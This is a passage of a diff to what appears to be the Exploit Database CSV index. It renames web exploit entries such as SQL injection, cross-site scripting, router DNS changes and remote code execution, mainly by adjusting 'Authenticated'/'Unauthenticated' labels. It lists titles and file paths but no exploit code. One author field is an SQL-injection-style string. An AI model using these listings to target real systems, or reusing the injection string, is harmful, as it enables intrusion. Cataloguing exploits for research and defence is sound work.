2.5.8 - 'referer' Header SQL Injection",2011-10-03,"Patroklos Argyroudis",webapps,php, 36201,exploits/php/webapps/36201.txt,"Phorum 5.2.18 - '/admin/index.php' Cross-Site Scripting",2011-10-03,"Stefan Schurtz",webapps,php, -36202,exploits/hardware/webapps/36202.py,"Seagate Business NAS 2014.00319 - Unauthenticated Remote Code Execution",2015-03-01,"OJ Reeves",webapps,hardware,80 +36202,exploits/hardware/webapps/36202.py,"Seagate Business NAS 2014.00319 - Remote Code Execution",2015-03-01,"OJ Reeves",webapps,hardware,80 36203,exploits/php/webapps/36203.txt,"vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (1)",2011-10-04,"Aung Khant",webapps,php, 36204,exploits/php/webapps/36204.txt,"vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Cross-Site Scripting Vulnerabilities",2011-10-04,"Aung Khant",webapps,php, 36208,exploits/php/webapps/36208.txt,"vTiger CRM 5.2 - 'onlyforuser' SQL Injection",2011-10-15,"Aung Khant",webapps,php, @@ -35787,8 +35788,8 @@ id,file,description,date,author,type,platform,port 36852,exploits/php/webapps/36852.txt,"TestLink - Multiple SQL Injections",2012-02-20,"Juan M. Natal",webapps,php, 36818,exploits/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload",2015-04-22,"CWH Underground",webapps,php,80 36821,exploits/php/webapps/36821.txt,"WebUI 1.5b6 - Remote Code Execution",2015-04-23,"TUNISIAN CYBER",webapps,php, -36823,exploits/php/webapps/36823.txt,"WordPress Plugin Ultimate Product Catalogue - Unauthenticated SQL Injection (1)",2015-04-23,"Felipe Molina",webapps,php, -36824,exploits/php/webapps/36824.txt,"WordPress Plugin Ultimate Product Catalogue - Unauthenticated SQL Injection (2)",2015-04-23,"Felipe Molina",webapps,php, +36823,exploits/php/webapps/36823.txt,"WordPress Plugin Ultimate Product Catalogue - SQL Injection (1)",2015-04-23,"Felipe Molina",webapps,php, +36824,exploits/php/webapps/36824.txt,"WordPress Plugin Ultimate Product Catalogue - SQL Injection (2)",2015-04-23,"Felipe Molina",webapps,php, 36830,exploits/php/webapps/36830.txt,"Impulsio CMS - 'id' SQL Injection",2012-02-16,sonyy,webapps,php, 36834,exploits/php/webapps/36834.txt,"Joomla! Component com_x-shop - 'idd' SQL Injection",2012-02-18,KedAns-Dz,webapps,php, 36835,exploits/php/webapps/36835.txt,"Joomla! Component com_xcomp - Local File Inclusion",2012-02-18,KedAns-Dz,webapps,php, @@ -35847,7 +35848,7 @@ id,file,description,date,author,type,platform,port 36926,exploits/php/webapps/36926.txt,"LeKommerce - 'id' SQL Injection",2012-03-08,Mazt0r,webapps,php, 36927,exploits/php/webapps/36927.txt,"ToendaCMS 1.6.2 - '/setup/index.php?site' Traversal Local File Inclusion",2012-03-08,AkaStep,webapps,php, 36929,exploits/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",webapps,jsp, -36930,exploits/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",webapps,multiple, +36930,exploits/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - SQL Injection",2015-05-07,"Felipe Molina",webapps,multiple, 36934,exploits/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - 'listing.aspx?searchText' Cross-Site Scripting",2012-03-08,vulns@dionach.com,webapps,asp, 36935,exploits/asp/webapps/36935.txt,"SAP Business Objects InfoView System - '/help/helpredir.aspx?guide' Cross-Site Scripting",2012-03-08,vulns@dionach.com,webapps,asp, 36936,exploits/asp/webapps/36936.txt,"SAP Business Objects InfoView System - '/webi/webi_modify.aspx?id' Cross-Site Scripting",2012-03-08,vulns@dionach.com,webapps,asp, @@ -36051,7 +36052,7 @@ id,file,description,date,author,type,platform,port 37208,exploits/php/webapps/37208.txt,"backupDB() 1.2.7a - 'onlyDB' Cross-Site Scripting",2012-05-16,LiquidWorm,webapps,php, 37209,exploits/php/webapps/37209.txt,"WordPress Plugin Really Simple Guest Post 1.0.6 - Local File Inclusion",2015-06-05,Kuroi'SH,webapps,php, 37213,exploits/ios/webapps/37213.txt,"WiFi HD 8.1 - Directory Traversal / Denial of Service",2015-06-06,"Wh1t3Rh1n0 (Michael Allen)",webapps,ios, -37214,exploits/hardware/webapps/37214.txt,"Broadlight Residential Gateway DI3124 - Unauthenticated Remote DNS Change",2015-06-06,"Todor Donev",webapps,hardware, +37214,exploits/hardware/webapps/37214.txt,"Broadlight Residential Gateway DI3124 - Remote DNS Change",2015-06-06,"Todor Donev",webapps,hardware, 37252,exploits/php/webapps/37252.txt,"WordPress Plugin RobotCPA V5 - Local File Inclusion",2015-06-10,T3N38R15,webapps,php,80 37216,exploits/php/webapps/37216.txt,"Unijimpe Captcha - 'captchademo.php' Cross-Site Scripting",2012-05-16,"Daniel Godoy",webapps,php, 37217,exploits/php/webapps/37217.txt,"ArtiPHP 5.5.0 Neo - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Gjoko Krstic",webapps,php, @@ -36068,10 +36069,10 @@ id,file,description,date,author,type,platform,port 37352,exploits/php/webapps/37352.txt,"Ignite Solutions CMS - 'car-details.php' SQL Injection",2012-06-03,Am!r,webapps,php, 37353,exploits/php/webapps/37353.php,"WordPress Plugin Nmedia WordPress Member Conversation 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",webapps,php, 37248,exploits/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - 'related.php?program' Blind SQL Injection",2015-06-09,Pancaker,webapps,php, -37237,exploits/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",webapps,hardware, -37238,exploits/hardware/webapps/37238.txt,"TP-Link TD-W8950ND ADSL2+ - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",webapps,hardware, +37237,exploits/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Remote DNS Change",2015-06-08,"Todor Donev",webapps,hardware, +37238,exploits/hardware/webapps/37238.txt,"TP-Link TD-W8950ND ADSL2+ - Remote DNS Change",2015-06-08,"Todor Donev",webapps,hardware, 37240,exploits/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",webapps,hardware, -37241,exploits/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",webapps,hardware, +37241,exploits/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Remote DNS Change",2015-06-08,"Todor Donev",webapps,hardware, 37243,exploits/php/webapps/37243.txt,"WordPress Plugin Wp-ImageZoom 1.1.0 - Multiple Vulnerabilities",2015-06-08,T3N38R15,webapps,php,80 37244,exploits/php/webapps/37244.txt,"WordPress Plugin WP Mobile Edition - Local File Inclusion",2015-06-08,"Ali Khalil",webapps,php, 37245,exploits/php/webapps/37245.txt,"Pasworld - 'detail.php' Blind SQL Injection",2015-06-08,"Sebastian khan",webapps,php, @@ -36105,7 +36106,7 @@ id,file,description,date,author,type,platform,port 37274,exploits/php/webapps/37274.txt,"WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",webapps,php,80 37275,exploits/php/webapps/37275.txt,"WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload",2015-06-12,"Larry W. Cashdollar",webapps,php,80 37283,exploits/php/webapps/37283.txt,"AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload",2012-05-20,"Eyup CELIK",webapps,php, -37316,exploits/php/webapps/37316.txt,"phpCollab 2.5 - Unauthenticated Direct Request Multiple Protected Page Access",2012-05-24,"team ' & 1=1--",webapps,php, +37316,exploits/php/webapps/37316.txt,"phpCollab 2.5 - Direct Request Multiple Protected Page Access",2012-05-24,"team ' & 1=1--",webapps,php, 37354,exploits/php/webapps/37354.py,"Bigware Shop 2.1x - 'main_bigware_54.php' SQL Injection",2012-06-05,rwenzel,webapps,php, 37290,exploits/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - '/admin/login.php' Authentication Bypass",2015-06-15,"walid naceri",webapps,php, 37329,exploits/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 - Multiple SQL Injections / Local File Inclusion",2012-05-27,n4ss1m,webapps,php, @@ -36239,7 +36240,7 @@ id,file,description,date,author,type,platform,port 37501,exploits/php/webapps/37501.rb,"WordPress Plugin Generic - Arbitrary File Upload",2012-07-13,KedAns-Dz,webapps,php, 37502,exploits/php/webapps/37502.txt,"Elite Bulletin Board - Multiple SQL Injections",2012-07-15,ToXiC,webapps,php, 37503,exploits/php/webapps/37503.txt,"Event Calender PHP - Multiple Input Validation Vulnerabilities",2012-07-16,snup,webapps,php, -37504,exploits/android/webapps/37504.py,"AirDroid - Unauthenticated Arbitrary File Upload",2015-07-06,"Parsa Adib",webapps,android,8888 +37504,exploits/android/webapps/37504.py,"AirDroid - Arbitrary File Upload",2015-07-06,"Parsa Adib",webapps,android,8888 37505,exploits/php/webapps/37505.txt,"Simple Machines 2.0.2 - Multiple HTML Injection Vulnerabilities",2012-07-16,"Benjamin Kunz Mejri",webapps,php, 37506,exploits/php/webapps/37506.php,"WordPress Plugin Post Recommendations - 'abspath' Remote File Inclusion",2012-07-16,"Sammy FORGIT",webapps,php, 37507,exploits/php/webapps/37507.txt,"web@all - 'name' Cross-Site Scripting",2012-07-16,"Sammy FORGIT",webapps,php, @@ -36248,7 +36249,7 @@ id,file,description,date,author,type,platform,port 37511,exploits/php/webapps/37511.txt,"AVA VoIP - Multiple Vulnerabilities",2012-07-17,"Ibrahim El-Sayed",webapps,php, 37514,exploits/php/webapps/37514.txt,"WordPress Plugin ACF Frontend Display 2.0.5 - Arbitrary File Upload",2015-07-07,"TUNISIAN CYBER",webapps,php,80 37515,exploits/php/webapps/37515.txt,"phpLiteAdmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,webapps,php,80 -37516,exploits/hardware/webapps/37516.txt,"D-Link DSL-2750u / DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",webapps,hardware, +37516,exploits/hardware/webapps/37516.txt,"D-Link DSL-2750u / DSL-2730u - (Authenticated) Local File Disclosure",2015-07-07,"SATHISH ARTHAR",webapps,hardware, 37519,exploits/php/webapps/37519.txt,"Joomla! Component com_hello - 'Controller' Local File Inclusion",2012-07-19,"AJAX Security Team",webapps,php, 37520,exploits/php/webapps/37520.txt,"Maian Survey - '/index.php' URI redirection / Local File Inclusion",2012-07-20,PuN!Sh3r,webapps,php, 37521,exploits/php/webapps/37521.txt,"CodeIgniter 2.1 - 'xss_clean()' Filter Security Bypass",2012-07-19,"Krzysztof Kotowicz",webapps,php, @@ -36280,7 +36281,7 @@ id,file,description,date,author,type,platform,port 37560,exploits/php/webapps/37560.txt,"WordPress Plugin CP Multi View Event Calendar 1.1.7 - SQL Injection",2015-07-10,"i0akiN SEC-LABORATORY",webapps,php, 37567,exploits/php/webapps/37567.txt,"tekno.Portal 0.1b - 'link.php' SQL Injection",2012-08-01,Socket_0x03,webapps,php, 37569,exploits/multiple/webapps/37569.txt,"ntop - 'arbfile' Cross-Site Scripting",2012-08-03,"Marcos Garcia",webapps,multiple, -37570,exploits/multiple/webapps/37570.py,"Zenoss 3.2.1 - Authenticated Remote Command Execution",2012-07-30,"Brendan Coles",webapps,multiple, +37570,exploits/multiple/webapps/37570.py,"Zenoss 3.2.1 - (Authenticated) Remote Command Execution",2012-07-30,"Brendan Coles",webapps,multiple, 37571,exploits/multiple/webapps/37571.txt,"Zenoss 3.2.1 - Multiple Vulnerabilities",2012-07-30,"Brendan Coles",webapps,multiple, 37572,exploits/php/webapps/37572.txt,"Elefant CMS - 'id' Cross-Site Scripting",2012-08-03,PuN!Sh3r,webapps,php, 37573,exploits/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",webapps,multiple, @@ -36308,7 +36309,7 @@ id,file,description,date,author,type,platform,port 37602,exploits/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",webapps,php,80 37603,exploits/php/webapps/37603.txt,"WordPress Plugin CP Contact Form with Paypal 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",webapps,php,80 37604,exploits/php/webapps/37604.txt,"SO Planning 1.32 - Multiple Vulnerabilities",2015-07-13,"Huy-Ngoc DAU",webapps,php,80 -37622,exploits/php/webapps/37622.txt,"WordPress Plugin Download Manager Free 2.7.94 & Pro 4 - Authenticated Persistent Cross-Site Scripting",2015-07-16,"Filippos Mastrogiannis",webapps,php, +37622,exploits/php/webapps/37622.txt,"WordPress Plugin Download Manager Free 2.7.94 & Pro 4 - (Authenticated) Persistent Cross-Site Scripting",2015-07-16,"Filippos Mastrogiannis",webapps,php, 37609,exploits/xml/webapps/37609.txt,"Pimcore CMS Build 3450 - Directory Traversal",2015-07-14,Portcullis,webapps,xml, 37610,exploits/php/webapps/37610.txt,"sysPass 1.0.9 - SQL Injection",2015-07-14,"SySS GmbH",webapps,php, 37613,exploits/php/webapps/37613.txt,"phpList 2.10.18 - 'index.php' SQL Injection",2012-08-08,"High-Tech Bridge SA",webapps,php, @@ -36428,12 +36429,12 @@ id,file,description,date,author,type,platform,port 37806,exploits/cgi/webapps/37806.txt,"AxisInternet VoIP Manager - Multiple Cross-Site Scripting Vulnerabilities",2012-09-18,"Benjamin Kunz Mejri",webapps,cgi, 37807,exploits/php/webapps/37807.txt,"vBulletin 4.1.12 - 'blog_plugin_useradmin.php' SQL Injection",2012-09-18,Am!r,webapps,php, 37809,exploits/php/webapps/37809.php,"Nuts CMS - PHP Remote Code Injection / Execution",2015-08-17,"Yakir Wizman",webapps,php,80 -37811,exploits/php/webapps/37811.py,"Magento CE < 1.9.0.1 - Authenticated Remote Code Execution",2015-08-18,Ebrietas0,webapps,php,80 +37811,exploits/php/webapps/37811.py,"Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution",2015-08-18,Ebrietas0,webapps,php,80 37817,exploits/php/webapps/37817.txt,"PHPfileNavigator 2.3.3 - Cross-Site Scripting",2015-08-18,hyp3rlinx,webapps,php,80 37818,exploits/php/webapps/37818.txt,"PHPfileNavigator 2.3.3 - Cross-Site Request Forgery",2015-08-18,hyp3rlinx,webapps,php,80 37819,exploits/php/webapps/37819.txt,"PHPfileNavigator 2.3.3 - Privilege Escalation",2015-08-18,hyp3rlinx,webapps,php,80 37820,exploits/php/webapps/37820.txt,"CodoForum 3.3.1 - Multiple SQL Injections",2015-08-18,"Curesec Research Team",webapps,php,80 -37821,exploits/php/webapps/37821.txt,"BigTree CMS 4.2.3 - Authenticated SQL Injection",2015-08-18,"Curesec Research Team",webapps,php,80 +37821,exploits/php/webapps/37821.txt,"BigTree CMS 4.2.3 - (Authenticated) SQL Injection",2015-08-18,"Curesec Research Team",webapps,php,80 37822,exploits/php/webapps/37822.txt,"WordPress Plugin WP Symposium 15.1 - Blind SQL Injection",2015-08-18,dxw,webapps,php,80 37827,exploits/php/webapps/37827.txt,"WordPress Theme Purity - Multiple Cross-Site Scripting Vulnerabilities",2012-09-07,"Matan Azugi",webapps,php, 37828,exploits/php/webapps/37828.txt,"Poweradmin - 'index.php' Cross-Site Scripting",2012-09-20,Siavash,webapps,php, @@ -36675,7 +36676,7 @@ id,file,description,date,author,type,platform,port 38339,exploits/php/webapps/38339.txt,"Centreon 2.6.1 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,webapps,php,80 38342,exploits/ios/webapps/38342.txt,"My.WiFi USB Drive 1.0 iOS - Local File Inclusion",2015-09-28,Vulnerability-Lab,webapps,ios,8080 38343,exploits/ios/webapps/38343.txt,"Photos in Wifi 1.0.1 iOS - Arbitrary File Upload",2015-09-28,Vulnerability-Lab,webapps,ios, -38345,exploits/php/webapps/38345.txt,"vTiger CRM 6.3.0 - Authenticated Remote Code Execution",2015-09-28,"Benjamin Daniel Mussler",webapps,php,80 +38345,exploits/php/webapps/38345.txt,"vTiger CRM 6.3.0 - (Authenticated) Remote Code Execution",2015-09-28,"Benjamin Daniel Mussler",webapps,php,80 38350,exploits/hardware/webapps/38350.txt,"Western Digital My Cloud 04.01.03-421/04.01.04-422 - Command Injection",2015-09-29,absane,webapps,hardware, 38351,exploits/asp/webapps/38351.txt,"Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (2)",2015-09-29,"Pedro Ribeiro",webapps,asp, 38354,exploits/php/webapps/38354.txt,"Plogger - Multiple Input Validation Vulnerabilities",2013-03-02,"Saadat Ullah",webapps,php, @@ -36705,7 +36706,7 @@ id,file,description,date,author,type,platform,port 38406,exploits/php/webapps/38406.txt,"PHP-Fusion 7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",webapps,php, 38407,exploits/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",webapps,php, 38408,exploits/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Cross-Site Scripting",2013-03-23,Metropolis,webapps,php, -38409,exploits/hardware/webapps/38409.html,"ZTE ZXHN H108N Router - Unauthenticated Configuration Disclosure",2015-10-06,"Todor Donev",webapps,hardware, +38409,exploits/hardware/webapps/38409.html,"ZTE ZXHN H108N Router - Configuration Disclosure",2015-10-06,"Todor Donev",webapps,hardware, 38410,exploits/php/webapps/38410.txt,"WordPress Plugin Banners Lite - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",webapps,php, 38411,exploits/python/webapps/38411.txt,"Zope Management Interface 4.3.7 - Cross-Site Request Forgery",2015-10-07,hyp3rlinx,webapps,python, 38413,exploits/php/webapps/38413.txt,"OrionDB Web Directory - Multiple Cross-Site Scripting Vulnerabilities",2013-03-27,3spi0n,webapps,php, @@ -36827,7 +36828,7 @@ id,file,description,date,author,type,platform,port 38624,exploits/php/webapps/38624.txt,"WordPress Plugin WP Feed - 'nid' SQL Injection",2013-07-02,"Iranian Exploit DataBase",webapps,php, 38625,exploits/php/webapps/38625.txt,"WordPress Plugin Category Grid View Gallery - 'ID' Cross-Site Scripting",2013-07-02,"Iranian Exploit DataBase",webapps,php, 38628,exploits/php/webapps/38628.txt,"HostBill - 'cpupdate.php' Authentication Bypass",2013-05-29,localhost.re,webapps,php, -38629,exploits/php/webapps/38629.txt,"vBulletin 5.1.x - Unauthenticated Remote Code Execution",2015-11-05,hhjj,webapps,php, +38629,exploits/php/webapps/38629.txt,"vBulletin 5.1.x - Remote Code Execution",2015-11-05,hhjj,webapps,php, 38642,exploits/php/webapps/38642.txt,"S9Y Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting",2013-07-12,"Omar Kurt",webapps,php, 38635,exploits/php/webapps/38635.txt,"iVote - 'details.php' SQL Injection",2013-07-10,"Ashiyane Digital Security Team",webapps,php, 38638,exploits/php/webapps/38638.txt,"Mintboard - Multiple Cross-Site Scripting Vulnerabilities",2013-07-10,"Canberk BOLAT",webapps,php, @@ -36846,7 +36847,7 @@ id,file,description,date,author,type,platform,port 38656,exploits/php/webapps/38656.html,"PrestaShop - Multiple Cross-Site Request Forgery Vulnerabilities",2013-07-11,"EntPro Cyber Security Research Group",webapps,php, 38657,exploits/hardware/webapps/38657.html,"Arris TG1682G Modem - Persistent Cross-Site Scripting",2015-11-09,Nu11By73,webapps,hardware, 38661,exploits/php/webapps/38661.txt,"TestLink 1.9.14 - Cross-Site Request Forgery",2015-11-09,"Aravind C Ajayan_ Balagopal N",webapps,php, -38664,exploits/java/webapps/38664.py,"Jenkins 1.633 - Unauthenticated Credential Recovery",2015-11-10,"The Repo",webapps,java, +38664,exploits/java/webapps/38664.py,"Jenkins 1.633 - Credential Recovery",2015-11-10,"The Repo",webapps,java, 38665,exploits/php/webapps/38665.txt,"YesWiki 0.2 - 'template' Directory Traversal",2015-11-10,HaHwul,webapps,php, 38684,exploits/php/webapps/38684.txt,"R-Scripts Vacation Rental Script 7R - Multiple Vulnerabilities",2015-11-12,LiquidWorm,webapps,php, 38673,exploits/php/webapps/38673.txt,"Collabtive - Multiple Vulnerabilities",2013-07-22,"Enrico Cinquini",webapps,php, @@ -37111,7 +37112,7 @@ id,file,description,date,author,type,platform,port 39176,exploits/php/webapps/39176.html,"TOA - Cross-Site Request Forgery",2014-05-08,"High-Tech Bridge",webapps,php, 39178,exploits/php/webapps/39178.txt,"CMS Touch - 'pages.php?Page_ID' SQL Injection",2014-05-08,indoushka,webapps,php, 39179,exploits/php/webapps/39179.txt,"CMS Touch - 'news.php?News_ID' SQL Injection",2014-05-08,indoushka,webapps,php, -39184,exploits/hardware/webapps/39184.txt,"MediaAccess TG788vn - Unauthenticated File Disclosure",2016-01-06,0x4148,webapps,hardware, +39184,exploits/hardware/webapps/39184.txt,"MediaAccess TG788vn - File Disclosure",2016-01-06,0x4148,webapps,hardware, 39187,exploits/asp/webapps/39187.txt,"CIS Manager - 'email' SQL Injection",2014-05-16,Edge,webapps,asp, 39188,exploits/php/webapps/39188.txt,"XOOPS Glossaire Module - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,webapps,php, 39189,exploits/php/webapps/39189.txt,"Softmatica SMART iPBX - Multiple SQL Injections",2014-05-19,AtT4CKxT3rR0r1ST,webapps,php, @@ -37130,7 +37131,7 @@ id,file,description,date,author,type,platform,port 39212,exploits/php/webapps/39212.txt,"WordPress Plugin JW Player for Flash & HTML5 Video - Cross-Site Request Forgery",2014-06-10,"Tom Adams",webapps,php, 39213,exploits/php/webapps/39213.txt,"WordPress Plugin Featured Comments - Cross-Site Request Forgery",2014-06-10,"Tom Adams",webapps,php, 39223,exploits/php/webapps/39223.txt,"ZeusCart - 'prodid' SQL Injection",2014-06-24,"Kenny Mathis",webapps,php, -39231,exploits/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Unauthenticated Remote Code Execution",2016-01-13,"Matt Buzanowski",webapps,asp, +39231,exploits/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Remote Code Execution",2016-01-13,"Matt Buzanowski",webapps,asp, 39234,exploits/php/webapps/39234.py,"SevOne NMS 5.3.6.0 - Remote Command Execution",2016-01-14,@iamsecurity,webapps,php,80 39235,exploits/multiple/webapps/39235.txt,"Manage Engine Applications Manager 12 - Multiple Vulnerabilities",2016-01-14,"Bikramaditya Guha",webapps,multiple,9090 39236,exploits/multiple/webapps/39236.py,"Manage Engine Application Manager 12.5 - Arbitrary Command Execution",2016-01-14,"Bikramaditya Guha",webapps,multiple, @@ -37182,7 +37183,7 @@ id,file,description,date,author,type,platform,port 39303,exploits/php/webapps/39303.txt,"WordPress Plugin Xhanch My Twitter - Cross-Site Request Forgery",2014-09-08,Voxel@Night,webapps,php, 39304,exploits/php/webapps/39304.txt,"WordPress Plugin W3 Total Cache - 'admin.php' Cross-Site Request Forgery",2014-09-08,Voxel@Night,webapps,php, 39306,exploits/php/webapps/39306.html,"pfSense Firewall 2.2.5 - Config File Cross-Site Request Forgery",2016-01-25,"Aatif Shahdad",webapps,php,443 -39309,exploits/php/webapps/39309.txt,"WordPress Plugin Booking Calendar Contact Form 1.1.23 - Unauthenticated SQL Injection",2016-01-25,"i0akiN SEC-LABORATORY",webapps,php,80 +39309,exploits/php/webapps/39309.txt,"WordPress Plugin Booking Calendar Contact Form 1.1.23 - SQL Injection",2016-01-25,"i0akiN SEC-LABORATORY",webapps,php,80 39313,exploits/php/webapps/39313.txt,"Food Order Portal - 'admin_user_delete.php' Cross-Site Request Forgery",2014-09-12,KnocKout,webapps,php, 39317,exploits/php/webapps/39317.txt,"WordPress Plugin Wordfence Security - Multiple Vulnerabilities",2014-09-14,Voxel@Night,webapps,php, 39319,exploits/php/webapps/39319.txt,"WordPress Plugin Booking Calendar Contact Form 1.1.23 - Shortcode SQL Injection",2016-01-26,"i0akiN SEC-LABORATORY",webapps,php,80 @@ -37253,7 +37254,7 @@ id,file,description,date,author,type,platform,port 39478,exploits/php/webapps/39478.txt,"SOLIDserver < 5.0.4 - Local File Inclusion",2016-02-20,"Saeed reza Zamanian",webapps,php, 39481,exploits/java/webapps/39481.txt,"BlackBerry Enterprise Service < 12.4 (BES12) Self-Service - Multiple Vulnerabilities",2016-02-22,Security-Assessment.com,webapps,java, 39485,exploits/asp/webapps/39485.txt,"Thru Managed File Transfer Portal 9.0.2 - SQL Injection",2016-02-22,"SySS GmbH",webapps,asp,80 -39486,exploits/windows/webapps/39486.txt,"Dell OpenManage Server Administrator 8.2 - Authenticated Directory Traversal",2016-02-23,hantwister,webapps,windows, +39486,exploits/windows/webapps/39486.txt,"Dell OpenManage Server Administrator 8.2 - (Authenticated) Directory Traversal",2016-02-23,hantwister,webapps,windows, 39488,exploits/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - Cross-Site Request Forgery",2016-02-23,"Julien Ahrens",webapps,json,8443 39489,exploits/php/webapps/39489.py,"WordPress Plugin Extra User Details 0.4.2 - Privilege Escalation",2016-02-24,"Panagiotis Vagenas",webapps,php,80 39495,exploits/windows/webapps/39495.py,"IBM Lotus Domino R8 - Password Hash Extraction",2016-02-25,"Jonathan Broche",webapps,windows, @@ -37335,13 +37336,13 @@ id,file,description,date,author,type,platform,port 39720,exploits/jsp/webapps/39720.txt,"Totemomail 4.x/5.x - Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,webapps,jsp, 39721,exploits/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,webapps,ios, 39725,exploits/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (Metasploit)",2016-04-25,"Federico Scalco",webapps,hardware,443 -39726,exploits/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 'sysconf.cgi' Unauthenticated Remote Command Execution (Metasploit)",2016-04-25,"Federico Scalco",webapps,hardware,443 +39726,exploits/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 'sysconf.cgi' Remote Command Execution (Metasploit)",2016-04-25,"Federico Scalco",webapps,hardware,443 39730,exploits/ruby/webapps/39730.txt,"NationBuilder - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-04-25,LiquidWorm,webapps,ruby,443 39737,exploits/php/webapps/39737.txt,"ImpressCMS 1.3.9 - SQL Injection",2016-04-26,"Manuel García Cárdenas",webapps,php,80 39738,exploits/multiple/webapps/39738.html,"EMC ViPR SRM - Cross-Site Request Forgery",2016-04-27,"Han Sahin",webapps,multiple,58080 39739,exploits/hardware/webapps/39739.py,"RomPager 4.34 (Multiple Router Vendors) - 'Misfortune Cookie' Authentication Bypass",2016-04-27,"Milad Doorbash",webapps,hardware, 39744,exploits/php/webapps/39744.html,"Observium 0.16.7533 - Cross-Site Request Forgery",2016-04-29,"Dolev Farhi",webapps,php,80 -39745,exploits/php/webapps/39745.txt,"Observium 0.16.7533 - Authenticated Arbitrary Command Execution",2016-04-29,"Dolev Farhi",webapps,php,80 +39745,exploits/php/webapps/39745.txt,"Observium 0.16.7533 - (Authenticated) Arbitrary Command Execution",2016-04-29,"Dolev Farhi",webapps,php,80 39746,exploits/cgi/webapps/39746.txt,"Merit Lilin IP Cameras - Multiple Vulnerabilities",2016-04-29,Orwelllabs,webapps,cgi,80 39751,exploits/php/webapps/39751.txt,"GLPi 0.90.2 - SQL Injection",2016-04-29,"High-Tech Bridge SA",webapps,php,80 39752,exploits/php/webapps/39752.txt,"WordPress Plugin Ghost 0.5.5 - Unrestricted Export Download",2016-05-02,"Josh Brody",webapps,php,80 @@ -37366,7 +37367,7 @@ id,file,description,date,author,type,platform,port 39821,exploits/python/webapps/39821.txt,"Web2py 2.14.5 - Multiple Vulnerabilities",2016-05-16,"Narendra Bhati",webapps,python, 39822,exploits/multiple/webapps/39822.rb,"Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",webapps,multiple, 39837,exploits/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,webapps,java, -39838,exploits/php/webapps/39838.php,"Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize / Arbitrary Write File",2016-05-18,agix,webapps,php,80 +39838,exploits/php/webapps/39838.php,"Magento < 2.0.6 - Arbitrary Unserialize / Arbitrary Write File",2016-05-18,agix,webapps,php,80 39840,exploits/xml/webapps/39840.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - SQL Injection",2016-05-19,ERPScan,webapps,xml, 39841,exploits/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Information Disclosure",2016-05-19,ERPScan,webapps,xml, 39848,exploits/php/webapps/39848.py,"WordPress Plugin Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",webapps,php,80 @@ -37385,7 +37386,7 @@ id,file,description,date,author,type,platform,port 39965,exploits/php/webapps/39965.txt,"Tiki Wiki CMS Calendar 6.15/9.11 LTS/12.5 LTS/14.2 - Remote Code Execution",2016-06-16,"Dany Ouellet",webapps,php,80 39879,exploits/php/webapps/39879.txt,"Joomla! Component SecurityCheck 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",webapps,php,80 